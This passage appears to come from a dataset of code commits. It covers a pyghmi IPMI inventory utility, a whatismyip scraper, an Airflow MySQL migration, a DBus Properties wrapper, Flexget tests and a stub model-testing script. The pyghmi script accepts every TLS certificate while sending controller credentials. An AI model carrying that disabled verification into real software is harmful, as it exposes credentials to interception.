# 0x3a 0xc4 0x3 0x0 0x21 0x1 0x9d 0x2f 0x76 0x32 0x2f 0x69 0x62 0x6d 0x63 0x2f 0x75 0x65 0x66 0x69 0x2f 0x66 0x6f 0x72 0x63 0x65 0x2d 0x69 0x6e 0x76 0x65 0x6e 0x74 0x6f 0x72 0x79 0x11 0x1
c = cmd.Command(sys.argv[1], os.environ['XCCUSER'], os.environ['XCCPASS'], verifycallback=lambda x: True)
c.oem_init()
c._oem.immhandler.set_property('/v2/ibmc/uefi/force-inventory', 1)
|
<commit_before><commit_msg>Add a utility to induce an inventory<commit_after>import pyghmi.ipmi.command as cmd
import sys
import os
# alternatively, the following ipmi raw sequence:
# 0x3a 0xc4 0x3 0x0 0x21 0x1 0x9d 0x2f 0x76 0x32 0x2f 0x69 0x62 0x6d 0x63 0x2f 0x75 0x65 0x66 0x69 0x2f 0x66 0x6f 0x72 0x63 0x65 0x2d 0x69 0x6e 0x76 0x65 0x6e 0x74 0x6f 0x72 0x79 0x11 0x1
c = cmd.Command(sys.argv[1], os.environ['XCCUSER'], os.environ['XCCPASS'], verifycallback=lambda x: True)
c.oem_init()
c._oem.immhandler.set_property('/v2/ibmc/uefi/force-inventory', 1)
|
|
b686bf04f64e1e907f6444233c6776458c02e120
|
whatismyip.py
|
whatismyip.py
|
#! /usr/bin/python
import requests
from bs4 import BeautifulSoup
def main():
r = requests.get('http://www.whatismyip.com')
soup = BeautifulSoup(r.text)
ip_address = ''
for span in soup.find('div', 'the-ip'):
ip_address += span.text
print(ip_address)
if __name__ == '__main__':
main()
|
Add script for checking your ip address
|
Add script for checking your ip address
|
Python
|
apache-2.0
|
MichaelAquilina/whatismyip
|
Add script for checking your ip address
|
#! /usr/bin/python
import requests
from bs4 import BeautifulSoup
def main():
r = requests.get('http://www.whatismyip.com')
soup = BeautifulSoup(r.text)
ip_address = ''
for span in soup.find('div', 'the-ip'):
ip_address += span.text
print(ip_address)
if __name__ == '__main__':
main()
|
<commit_before><commit_msg>Add script for checking your ip address<commit_after>
|
#! /usr/bin/python
import requests
from bs4 import BeautifulSoup
def main():
r = requests.get('http://www.whatismyip.com')
soup = BeautifulSoup(r.text)
ip_address = ''
for span in soup.find('div', 'the-ip'):
ip_address += span.text
print(ip_address)
if __name__ == '__main__':
main()
|
Add script for checking your ip address#! /usr/bin/python
import requests
from bs4 import BeautifulSoup
def main():
r = requests.get('http://www.whatismyip.com')
soup = BeautifulSoup(r.text)
ip_address = ''
for span in soup.find('div', 'the-ip'):
ip_address += span.text
print(ip_address)
if __name__ == '__main__':
main()
|
<commit_before><commit_msg>Add script for checking your ip address<commit_after>#! /usr/bin/python
import requests
from bs4 import BeautifulSoup
def main():
r = requests.get('http://www.whatismyip.com')
soup = BeautifulSoup(r.text)
ip_address = ''
for span in soup.find('div', 'the-ip'):
ip_address += span.text
print(ip_address)
if __name__ == '__main__':
main()
|
|
8a2d24856ba86dc807d91905fedc9af7faca99be
|
airflow/migrations/versions/d2ae31099d61_increase_text_size_for_mysql.py
|
airflow/migrations/versions/d2ae31099d61_increase_text_size_for_mysql.py
|
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Increase text size for MySQL (not relevant for other DBs' text types)
Revision ID: d2ae31099d61
Revises: 947454bf1dff
Create Date: 2017-08-18 17:07:16.686130
"""
# revision identifiers, used by Alembic.
revision = 'd2ae31099d61'
down_revision = '947454bf1dff'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
from alembic import context
def upgrade():
if context.config.get_main_option('sqlalchemy.url').startswith('mysql'):
op.alter_column(table_name='variable', column_name='val', type_=mysql.MEDIUMTEXT)
def downgrade():
if context.config.get_main_option('sqlalchemy.url').startswith('mysql'):
op.alter_column(table_name='variable', column_name='val', type_=mysql.TEXT)
|
Increase text size for var field in variables for MySQL
|
[AIRFLOW-1522] Increase text size for var field in variables for MySQL
Closes #2535 from saguziel/aguziel-increase-text
|
Python
|
apache-2.0
|
subodhchhabra/airflow,Fokko/incubator-airflow,criccomini/airflow,gtoonstra/airflow,hgrif/incubator-airflow,apache/airflow,jfantom/incubator-airflow,zack3241/incubator-airflow,r39132/airflow,Twistbioscience/incubator-airflow,sergiohgz/incubator-airflow,Acehaidrey/incubator-airflow,CloverHealth/airflow,yk5/incubator-airflow,apache/airflow,nathanielvarona/airflow,spektom/incubator-airflow,apache/incubator-airflow,mrkm4ntr/incubator-airflow,apache/incubator-airflow,Acehaidrey/incubator-airflow,gtoonstra/airflow,janczak10/incubator-airflow,gilt/incubator-airflow,sid88in/incubator-airflow,CloverHealth/airflow,danielvdende/incubator-airflow,spektom/incubator-airflow,yati-sagade/incubator-airflow,Tagar/incubator-airflow,apache/airflow,danielvdende/incubator-airflow,OpringaoDoTurno/airflow,skudriashev/incubator-airflow,nathanielvarona/airflow,mistercrunch/airflow,jhsenjaliya/incubator-airflow,owlabs/incubator-airflow,mtagle/airflow,sekikn/incubator-airflow,Twistbioscience/incubator-airflow,cfei18/incubator-airflow,jhsenjaliya/incubator-airflow,sergiohgz/incubator-airflow,cjqian/incubator-airflow,RealImpactAnalytics/airflow,andyxhadji/incubator-airflow,malmiron/incubator-airflow,cfei18/incubator-airflow,spektom/incubator-airflow,Twistbioscience/incubator-airflow,jgao54/airflow,airbnb/airflow,sergiohgz/incubator-airflow,MortalViews/incubator-airflow,KL-WLCR/incubator-airflow,OpringaoDoTurno/airflow,zack3241/incubator-airflow,wolfier/incubator-airflow,CloverHealth/airflow,subodhchhabra/airflow,lyft/incubator-airflow,mtagle/airflow,mrkm4ntr/incubator-airflow,adamhaney/airflow,sergiohgz/incubator-airflow,r39132/airflow,jfantom/incubator-airflow,bolkedebruin/airflow,lyft/incubator-airflow,adamhaney/airflow,CloverHealth/airflow,danielvdende/incubator-airflow,KL-WLCR/incubator-airflow,ProstoMaxim/incubator-airflow,jhsenjaliya/incubator-airflow,apache/incubator-airflow,subodhchhabra/airflow,subodhchhabra/airflow,Twistbioscience/incubator-airflow,Acehaidrey/incubator-airflow,sid88in/incubator-airflow,r39132/airflow,malmiron/incubator-airflow,sid88in/incubator-airflow,ProstoMaxim/incubator-airflow,skudriashev/incubator-airflow,lyft/incubator-airflow,mrares/incubator-airflow,gtoonstra/airflow,wileeam/airflow,bolkedebruin/airflow,nathanielvarona/airflow,DinoCow/airflow,apache/airflow,edgarRd/incubator-airflow,Tagar/incubator-airflow,wolfier/incubator-airflow,artwr/airflow,wooga/airflow,jgao54/airflow,zack3241/incubator-airflow,yati-sagade/incubator-airflow,fenglu-g/incubator-airflow,OpringaoDoTurno/airflow,mistercrunch/airflow,yk5/incubator-airflow,owlabs/incubator-airflow,janczak10/incubator-airflow,airbnb/airflow,cjqian/incubator-airflow,Tagar/incubator-airflow,Acehaidrey/incubator-airflow,cfei18/incubator-airflow,OpringaoDoTurno/airflow,yati-sagade/incubator-airflow,akosel/incubator-airflow,wndhydrnt/airflow,DinoCow/airflow,mistercrunch/airflow,adamhaney/airflow,apache/airflow,nathanielvarona/airflow,danielvdende/incubator-airflow,akosel/incubator-airflow,mtagle/airflow,ProstoMaxim/incubator-airflow,jgao54/airflow,wileeam/airflow,mrares/incubator-airflow,edgarRd/incubator-airflow,andyxhadji/incubator-airflow,hgrif/incubator-airflow,wooga/airflow,adamhaney/airflow,skudriashev/incubator-airflow,mtagle/airflow,criccomini/airflow,dhuang/incubator-airflow,wndhydrnt/airflow,cfei18/incubator-airflow,bolkedebruin/airflow,KL-WLCR/incubator-airflow,lxneng/incubator-airflow,janczak10/incubator-airflow,yati-sagade/incubator-airflow,akosel/incubator-airflow,gtoonstra/airflow,Fokko/incubator-airflow,gilt/incubator-airflow,artwr/airflow,dhuang/incubator-airflow,DinoCow/airflow,janczak10/incubator-airflow,fenglu-g/incubator-airflow,criccomini/airflow,Acehaidrey/incubator-airflow,RealImpactAnalytics/airflow,lyft/incubator-airflow,ProstoMaxim/incubator-airflow,cjqian/incubator-airflow,bolkedebruin/airflow,mrares/incubator-airflow,nathanielvarona/airflow,lxneng/incubator-airflow,yk5/incubator-airflow,wooga/airflow,wileeam/airflow,Fokko/incubator-airflow,r39132/airflow,malmiron/incubator-airflow,fenglu-g/incubator-airflow,sekikn/incubator-airflow,MortalViews/incubator-airflow,fenglu-g/incubator-airflow,wooga/airflow,sid88in/incubator-airflow,sekikn/incubator-airflow,wolfier/incubator-airflow,cfei18/incubator-airflow,gilt/incubator-airflow,apache/airflow,edgarRd/incubator-airflow,andyxhadji/incubator-airflow,wolfier/incubator-airflow,yk5/incubator-airflow,criccomini/airflow,DinoCow/airflow,Acehaidrey/incubator-airflow,danielvdende/incubator-airflow,zack3241/incubator-airflow,mrares/incubator-airflow,RealImpactAnalytics/airflow,dhuang/incubator-airflow,danielvdende/incubator-airflow,apache/incubator-airflow,cjqian/incubator-airflow,Fokko/incubator-airflow,jhsenjaliya/incubator-airflow,wndhydrnt/airflow,jfantom/incubator-airflow,malmiron/incubator-airflow,hgrif/incubator-airflow,edgarRd/incubator-airflow,KL-WLCR/incubator-airflow,spektom/incubator-airflow,dhuang/incubator-airflow,sekikn/incubator-airflow,wileeam/airflow,airbnb/airflow,artwr/airflow,airbnb/airflow,nathanielvarona/airflow,bolkedebruin/airflow,cfei18/incubator-airflow,lxneng/incubator-airflow,MortalViews/incubator-airflow,skudriashev/incubator-airflow,jgao54/airflow,andyxhadji/incubator-airflow,wndhydrnt/airflow,MortalViews/incubator-airflow,akosel/incubator-airflow,jfantom/incubator-airflow,Tagar/incubator-airflow,gilt/incubator-airflow,mistercrunch/airflow,artwr/airflow,owlabs/incubator-airflow,mrkm4ntr/incubator-airflow,lxneng/incubator-airflow,RealImpactAnalytics/airflow,hgrif/incubator-airflow,mrkm4ntr/incubator-airflow,owlabs/incubator-airflow
|
[AIRFLOW-1522] Increase text size for var field in variables for MySQL
Closes #2535 from saguziel/aguziel-increase-text
|
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Increase text size for MySQL (not relevant for other DBs' text types)
Revision ID: d2ae31099d61
Revises: 947454bf1dff
Create Date: 2017-08-18 17:07:16.686130
"""
# revision identifiers, used by Alembic.
revision = 'd2ae31099d61'
down_revision = '947454bf1dff'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
from alembic import context
def upgrade():
if context.config.get_main_option('sqlalchemy.url').startswith('mysql'):
op.alter_column(table_name='variable', column_name='val', type_=mysql.MEDIUMTEXT)
def downgrade():
if context.config.get_main_option('sqlalchemy.url').startswith('mysql'):
op.alter_column(table_name='variable', column_name='val', type_=mysql.TEXT)
|
<commit_before><commit_msg>[AIRFLOW-1522] Increase text size for var field in variables for MySQL
Closes #2535 from saguziel/aguziel-increase-text<commit_after>
|
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Increase text size for MySQL (not relevant for other DBs' text types)
Revision ID: d2ae31099d61
Revises: 947454bf1dff
Create Date: 2017-08-18 17:07:16.686130
"""
# revision identifiers, used by Alembic.
revision = 'd2ae31099d61'
down_revision = '947454bf1dff'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
from alembic import context
def upgrade():
if context.config.get_main_option('sqlalchemy.url').startswith('mysql'):
op.alter_column(table_name='variable', column_name='val', type_=mysql.MEDIUMTEXT)
def downgrade():
if context.config.get_main_option('sqlalchemy.url').startswith('mysql'):
op.alter_column(table_name='variable', column_name='val', type_=mysql.TEXT)
|
[AIRFLOW-1522] Increase text size for var field in variables for MySQL
Closes #2535 from saguziel/aguziel-increase-text#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Increase text size for MySQL (not relevant for other DBs' text types)
Revision ID: d2ae31099d61
Revises: 947454bf1dff
Create Date: 2017-08-18 17:07:16.686130
"""
# revision identifiers, used by Alembic.
revision = 'd2ae31099d61'
down_revision = '947454bf1dff'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
from alembic import context
def upgrade():
if context.config.get_main_option('sqlalchemy.url').startswith('mysql'):
op.alter_column(table_name='variable', column_name='val', type_=mysql.MEDIUMTEXT)
def downgrade():
if context.config.get_main_option('sqlalchemy.url').startswith('mysql'):
op.alter_column(table_name='variable', column_name='val', type_=mysql.TEXT)
|
<commit_before><commit_msg>[AIRFLOW-1522] Increase text size for var field in variables for MySQL
Closes #2535 from saguziel/aguziel-increase-text<commit_after>#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Increase text size for MySQL (not relevant for other DBs' text types)
Revision ID: d2ae31099d61
Revises: 947454bf1dff
Create Date: 2017-08-18 17:07:16.686130
"""
# revision identifiers, used by Alembic.
revision = 'd2ae31099d61'
down_revision = '947454bf1dff'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
from alembic import context
def upgrade():
if context.config.get_main_option('sqlalchemy.url').startswith('mysql'):
op.alter_column(table_name='variable', column_name='val', type_=mysql.MEDIUMTEXT)
def downgrade():
if context.config.get_main_option('sqlalchemy.url').startswith('mysql'):
op.alter_column(table_name='variable', column_name='val', type_=mysql.TEXT)
|
|
e348c4620f6de3d70c0b7d71afcb00727339bfd4
|
src/cli/_dbus/_properties.py
|
src/cli/_dbus/_properties.py
|
"""
Properties interface.
"""
class Properties(object):
"""
Properties interface.
"""
_INTERFACE_NAME = 'org.freedesktop.DBus.Properties'
def __init__(self, dbus_object):
"""
Initializer.
:param dbus_object: the dbus object
"""
self._dbus_object = dbus_object
def Get(self, interface_name, property_name):
"""
Get a property.
:param str interface_name: the interface that supplies this prop
:param str property_name: a property name
:returns: the property
:rtype: Variant
"""
return self._dbus_object.Get(
interface_name,
property_name,
dbus_interface=self._INTERFACE_NAME
)
def GetAll(self, interface_name):
"""
Get all properties belonging to ``interface_name``.
:param str interface_name: the interface name
:returns: the properties belonging to this interface
:rtype: Dict of (String * Variant)
"""
return self._dbus_object.GetAll(
interface_name,
dbus_interface=self._INTERFACE_NAME
)
def Set(self, interface_name, property_name, value):
"""
Set a property.
:param str interface_name: the interface name
:param str property_name: a property name
:param object value: the value to set
"""
self._dbus_object.Set(
interface_name,
property_name,
value,
dbus_interface=self._INTERFACE_NAME
)
|
Add a class for the DBus.Properties interface.
|
Add a class for the DBus.Properties interface.
Signed-off-by: mulhern <7b51bcf507bcd7afb72bf8663752c0ddbeb517f6@redhat.com>
|
Python
|
apache-2.0
|
stratis-storage/stratis-cli,stratis-storage/stratis-cli
|
Add a class for the DBus.Properties interface.
Signed-off-by: mulhern <7b51bcf507bcd7afb72bf8663752c0ddbeb517f6@redhat.com>
|
"""
Properties interface.
"""
class Properties(object):
"""
Properties interface.
"""
_INTERFACE_NAME = 'org.freedesktop.DBus.Properties'
def __init__(self, dbus_object):
"""
Initializer.
:param dbus_object: the dbus object
"""
self._dbus_object = dbus_object
def Get(self, interface_name, property_name):
"""
Get a property.
:param str interface_name: the interface that supplies this prop
:param str property_name: a property name
:returns: the property
:rtype: Variant
"""
return self._dbus_object.Get(
interface_name,
property_name,
dbus_interface=self._INTERFACE_NAME
)
def GetAll(self, interface_name):
"""
Get all properties belonging to ``interface_name``.
:param str interface_name: the interface name
:returns: the properties belonging to this interface
:rtype: Dict of (String * Variant)
"""
return self._dbus_object.GetAll(
interface_name,
dbus_interface=self._INTERFACE_NAME
)
def Set(self, interface_name, property_name, value):
"""
Set a property.
:param str interface_name: the interface name
:param str property_name: a property name
:param object value: the value to set
"""
self._dbus_object.Set(
interface_name,
property_name,
value,
dbus_interface=self._INTERFACE_NAME
)
|
<commit_before><commit_msg>Add a class for the DBus.Properties interface.
Signed-off-by: mulhern <7b51bcf507bcd7afb72bf8663752c0ddbeb517f6@redhat.com><commit_after>
|
"""
Properties interface.
"""
class Properties(object):
"""
Properties interface.
"""
_INTERFACE_NAME = 'org.freedesktop.DBus.Properties'
def __init__(self, dbus_object):
"""
Initializer.
:param dbus_object: the dbus object
"""
self._dbus_object = dbus_object
def Get(self, interface_name, property_name):
"""
Get a property.
:param str interface_name: the interface that supplies this prop
:param str property_name: a property name
:returns: the property
:rtype: Variant
"""
return self._dbus_object.Get(
interface_name,
property_name,
dbus_interface=self._INTERFACE_NAME
)
def GetAll(self, interface_name):
"""
Get all properties belonging to ``interface_name``.
:param str interface_name: the interface name
:returns: the properties belonging to this interface
:rtype: Dict of (String * Variant)
"""
return self._dbus_object.GetAll(
interface_name,
dbus_interface=self._INTERFACE_NAME
)
def Set(self, interface_name, property_name, value):
"""
Set a property.
:param str interface_name: the interface name
:param str property_name: a property name
:param object value: the value to set
"""
self._dbus_object.Set(
interface_name,
property_name,
value,
dbus_interface=self._INTERFACE_NAME
)
|
Add a class for the DBus.Properties interface.
Signed-off-by: mulhern <7b51bcf507bcd7afb72bf8663752c0ddbeb517f6@redhat.com>"""
Properties interface.
"""
class Properties(object):
"""
Properties interface.
"""
_INTERFACE_NAME = 'org.freedesktop.DBus.Properties'
def __init__(self, dbus_object):
"""
Initializer.
:param dbus_object: the dbus object
"""
self._dbus_object = dbus_object
def Get(self, interface_name, property_name):
"""
Get a property.
:param str interface_name: the interface that supplies this prop
:param str property_name: a property name
:returns: the property
:rtype: Variant
"""
return self._dbus_object.Get(
interface_name,
property_name,
dbus_interface=self._INTERFACE_NAME
)
def GetAll(self, interface_name):
"""
Get all properties belonging to ``interface_name``.
:param str interface_name: the interface name
:returns: the properties belonging to this interface
:rtype: Dict of (String * Variant)
"""
return self._dbus_object.GetAll(
interface_name,
dbus_interface=self._INTERFACE_NAME
)
def Set(self, interface_name, property_name, value):
"""
Set a property.
:param str interface_name: the interface name
:param str property_name: a property name
:param object value: the value to set
"""
self._dbus_object.Set(
interface_name,
property_name,
value,
dbus_interface=self._INTERFACE_NAME
)
|
<commit_before><commit_msg>Add a class for the DBus.Properties interface.
Signed-off-by: mulhern <7b51bcf507bcd7afb72bf8663752c0ddbeb517f6@redhat.com><commit_after>"""
Properties interface.
"""
class Properties(object):
"""
Properties interface.
"""
_INTERFACE_NAME = 'org.freedesktop.DBus.Properties'
def __init__(self, dbus_object):
"""
Initializer.
:param dbus_object: the dbus object
"""
self._dbus_object = dbus_object
def Get(self, interface_name, property_name):
"""
Get a property.
:param str interface_name: the interface that supplies this prop
:param str property_name: a property name
:returns: the property
:rtype: Variant
"""
return self._dbus_object.Get(
interface_name,
property_name,
dbus_interface=self._INTERFACE_NAME
)
def GetAll(self, interface_name):
"""
Get all properties belonging to ``interface_name``.
:param str interface_name: the interface name
:returns: the properties belonging to this interface
:rtype: Dict of (String * Variant)
"""
return self._dbus_object.GetAll(
interface_name,
dbus_interface=self._INTERFACE_NAME
)
def Set(self, interface_name, property_name, value):
"""
Set a property.
:param str interface_name: the interface name
:param str property_name: a property name
:param object value: the value to set
"""
self._dbus_object.Set(
interface_name,
property_name,
value,
dbus_interface=self._INTERFACE_NAME
)
|
|
0ab3ee0394af8aafe5d3815456ae2bc599c814b6
|
tests/test_parsingapi.py
|
tests/test_parsingapi.py
|
from __future__ import unicode_literals, division, absolute_import
from flexget.plugin import get_plugin_by_name, get_plugins
from flexget.plugins.parsers import plugin_parsing
from tests import FlexGetBase
class TestParsingAPI(FlexGetBase):
def test_all_types_handled(self):
declared_types = set(plugin_parsing.PARSER_TYPES)
method_handlers = set(m[6:] for m in dir(get_plugin_by_name('parsing').instance) if m.startswith('parse_'))
assert set(declared_types) == set(method_handlers), \
'declared parser types: %s, handled types: %s' % (declared_types, method_handlers)
def test_parsing_plugins_have_parse_methods(self):
for parser_type in plugin_parsing.PARSER_TYPES:
for plugin in get_plugins(group='%s_parser' % parser_type):
assert hasattr(plugin.instance, 'parse_%s' % parser_type), \
'{type} parsing plugin {name} has no parse_{type} method'.format(type=parser_type, name=plugin.name)
|
Add some tests to validate modular parsing api
|
Add some tests to validate modular parsing api
|
Python
|
mit
|
Danfocus/Flexget,ianstalk/Flexget,Flexget/Flexget,poulpito/Flexget,grrr2/Flexget,antivirtel/Flexget,oxc/Flexget,camon/Flexget,poulpito/Flexget,ianstalk/Flexget,OmgOhnoes/Flexget,ratoaq2/Flexget,crawln45/Flexget,vfrc2/Flexget,ZefQ/Flexget,v17al/Flexget,jacobmetrick/Flexget,ratoaq2/Flexget,sean797/Flexget,thalamus/Flexget,ibrahimkarahan/Flexget,offbyone/Flexget,JorisDeRieck/Flexget,malkavi/Flexget,patsissons/Flexget,tvcsantos/Flexget,tarzasai/Flexget,qvazzler/Flexget,gazpachoking/Flexget,JorisDeRieck/Flexget,tsnoam/Flexget,grrr2/Flexget,spencerjanssen/Flexget,cvium/Flexget,Danfocus/Flexget,JorisDeRieck/Flexget,oxc/Flexget,jawilson/Flexget,malkavi/Flexget,offbyone/Flexget,LynxyssCZ/Flexget,patsissons/Flexget,tvcsantos/Flexget,cvium/Flexget,ZefQ/Flexget,malkavi/Flexget,crawln45/Flexget,Flexget/Flexget,ianstalk/Flexget,ibrahimkarahan/Flexget,thalamus/Flexget,dsemi/Flexget,dsemi/Flexget,tarzasai/Flexget,sean797/Flexget,LynxyssCZ/Flexget,offbyone/Flexget,drwyrm/Flexget,qvazzler/Flexget,vfrc2/Flexget,Danfocus/Flexget,antivirtel/Flexget,crawln45/Flexget,LynxyssCZ/Flexget,crawln45/Flexget,qk4l/Flexget,jacobmetrick/Flexget,tarzasai/Flexget,antivirtel/Flexget,thalamus/Flexget,Flexget/Flexget,tobinjt/Flexget,tobinjt/Flexget,xfouloux/Flexget,drwyrm/Flexget,spencerjanssen/Flexget,xfouloux/Flexget,cvium/Flexget,qk4l/Flexget,qvazzler/Flexget,tobinjt/Flexget,OmgOhnoes/Flexget,gazpachoking/Flexget,jawilson/Flexget,LynxyssCZ/Flexget,lildadou/Flexget,lildadou/Flexget,malkavi/Flexget,dsemi/Flexget,poulpito/Flexget,OmgOhnoes/Flexget,spencerjanssen/Flexget,jacobmetrick/Flexget,jawilson/Flexget,vfrc2/Flexget,tsnoam/Flexget,Flexget/Flexget,JorisDeRieck/Flexget,jawilson/Flexget,patsissons/Flexget,ratoaq2/Flexget,xfouloux/Flexget,drwyrm/Flexget,tobinjt/Flexget,grrr2/Flexget,ibrahimkarahan/Flexget,v17al/Flexget,sean797/Flexget,ZefQ/Flexget,oxc/Flexget,Danfocus/Flexget,Pretagonist/Flexget,qk4l/Flexget,lildadou/Flexget,camon/Flexget,tsnoam/Flexget,Pretagonist/Flexget,Pretagonist/Flexget,v17al/Flexget
|
Add some tests to validate modular parsing api
|
from __future__ import unicode_literals, division, absolute_import
from flexget.plugin import get_plugin_by_name, get_plugins
from flexget.plugins.parsers import plugin_parsing
from tests import FlexGetBase
class TestParsingAPI(FlexGetBase):
def test_all_types_handled(self):
declared_types = set(plugin_parsing.PARSER_TYPES)
method_handlers = set(m[6:] for m in dir(get_plugin_by_name('parsing').instance) if m.startswith('parse_'))
assert set(declared_types) == set(method_handlers), \
'declared parser types: %s, handled types: %s' % (declared_types, method_handlers)
def test_parsing_plugins_have_parse_methods(self):
for parser_type in plugin_parsing.PARSER_TYPES:
for plugin in get_plugins(group='%s_parser' % parser_type):
assert hasattr(plugin.instance, 'parse_%s' % parser_type), \
'{type} parsing plugin {name} has no parse_{type} method'.format(type=parser_type, name=plugin.name)
|
<commit_before><commit_msg>Add some tests to validate modular parsing api<commit_after>
|
from __future__ import unicode_literals, division, absolute_import
from flexget.plugin import get_plugin_by_name, get_plugins
from flexget.plugins.parsers import plugin_parsing
from tests import FlexGetBase
class TestParsingAPI(FlexGetBase):
def test_all_types_handled(self):
declared_types = set(plugin_parsing.PARSER_TYPES)
method_handlers = set(m[6:] for m in dir(get_plugin_by_name('parsing').instance) if m.startswith('parse_'))
assert set(declared_types) == set(method_handlers), \
'declared parser types: %s, handled types: %s' % (declared_types, method_handlers)
def test_parsing_plugins_have_parse_methods(self):
for parser_type in plugin_parsing.PARSER_TYPES:
for plugin in get_plugins(group='%s_parser' % parser_type):
assert hasattr(plugin.instance, 'parse_%s' % parser_type), \
'{type} parsing plugin {name} has no parse_{type} method'.format(type=parser_type, name=plugin.name)
|
Add some tests to validate modular parsing apifrom __future__ import unicode_literals, division, absolute_import
from flexget.plugin import get_plugin_by_name, get_plugins
from flexget.plugins.parsers import plugin_parsing
from tests import FlexGetBase
class TestParsingAPI(FlexGetBase):
def test_all_types_handled(self):
declared_types = set(plugin_parsing.PARSER_TYPES)
method_handlers = set(m[6:] for m in dir(get_plugin_by_name('parsing').instance) if m.startswith('parse_'))
assert set(declared_types) == set(method_handlers), \
'declared parser types: %s, handled types: %s' % (declared_types, method_handlers)
def test_parsing_plugins_have_parse_methods(self):
for parser_type in plugin_parsing.PARSER_TYPES:
for plugin in get_plugins(group='%s_parser' % parser_type):
assert hasattr(plugin.instance, 'parse_%s' % parser_type), \
'{type} parsing plugin {name} has no parse_{type} method'.format(type=parser_type, name=plugin.name)
|
<commit_before><commit_msg>Add some tests to validate modular parsing api<commit_after>from __future__ import unicode_literals, division, absolute_import
from flexget.plugin import get_plugin_by_name, get_plugins
from flexget.plugins.parsers import plugin_parsing
from tests import FlexGetBase
class TestParsingAPI(FlexGetBase):
def test_all_types_handled(self):
declared_types = set(plugin_parsing.PARSER_TYPES)
method_handlers = set(m[6:] for m in dir(get_plugin_by_name('parsing').instance) if m.startswith('parse_'))
assert set(declared_types) == set(method_handlers), \
'declared parser types: %s, handled types: %s' % (declared_types, method_handlers)
def test_parsing_plugins_have_parse_methods(self):
for parser_type in plugin_parsing.PARSER_TYPES:
for plugin in get_plugins(group='%s_parser' % parser_type):
assert hasattr(plugin.instance, 'parse_%s' % parser_type), \
'{type} parsing plugin {name} has no parse_{type} method'.format(type=parser_type, name=plugin.name)
|
|
a0bb9f02a3aa5e58cca3760ef219d170db853864
|
ModelHandler/TestModels.py
|
ModelHandler/TestModels.py
|
import DatasetHandler.CreateDataset as CreateDataset
# Test functions to handle models
def DatasetTester(dataset, dataset_uid):
# Load dataset, report input sizes
# Cook features for various models
# Report feature output sizes
# Try top models - regular with fixed size or the "heatmap"
return []
def main():
[dataset, uniqueId] = CreateDataset.load_1200x_marked_299x299(desired_number=50, seed=42)
DatasetTester(dataset, dataset_uid=uniqueId)
main()
|
Structure of the test function for Dataset working - we will test various CNN models on it and attach to them various custom tops
|
Structure of the test function for Dataset working - we will test various CNN models on it and attach to them various custom tops
|
Python
|
mit
|
previtus/MGR-Project-Code,previtus/MGR-Project-Code,previtus/MGR-Project-Code
|
Structure of the test function for Dataset working - we will test various CNN models on it and attach to them various custom tops
|
import DatasetHandler.CreateDataset as CreateDataset
# Test functions to handle models
def DatasetTester(dataset, dataset_uid):
# Load dataset, report input sizes
# Cook features for various models
# Report feature output sizes
# Try top models - regular with fixed size or the "heatmap"
return []
def main():
[dataset, uniqueId] = CreateDataset.load_1200x_marked_299x299(desired_number=50, seed=42)
DatasetTester(dataset, dataset_uid=uniqueId)
main()
|
<commit_before><commit_msg>Structure of the test function for Dataset working - we will test various CNN models on it and attach to them various custom tops<commit_after>
|
import DatasetHandler.CreateDataset as CreateDataset
# Test functions to handle models
def DatasetTester(dataset, dataset_uid):
# Load dataset, report input sizes
# Cook features for various models
# Report feature output sizes
# Try top models - regular with fixed size or the "heatmap"
return []
def main():
[dataset, uniqueId] = CreateDataset.load_1200x_marked_299x299(desired_number=50, seed=42)
DatasetTester(dataset, dataset_uid=uniqueId)
main()
|
Structure of the test function for Dataset working - we will test various CNN models on it and attach to them various custom topsimport DatasetHandler.CreateDataset as CreateDataset
# Test functions to handle models
def DatasetTester(dataset, dataset_uid):
# Load dataset, report input sizes
# Cook features for various models
# Report feature output sizes
# Try top models - regular with fixed size or the "heatmap"
return []
def main():
[dataset, uniqueId] = CreateDataset.load_1200x_marked_299x299(desired_number=50, seed=42)
DatasetTester(dataset, dataset_uid=uniqueId)
main()
|
<commit_before><commit_msg>Structure of the test function for Dataset working - we will test various CNN models on it and attach to them various custom tops<commit_after>import DatasetHandler.CreateDataset as CreateDataset
# Test functions to handle models
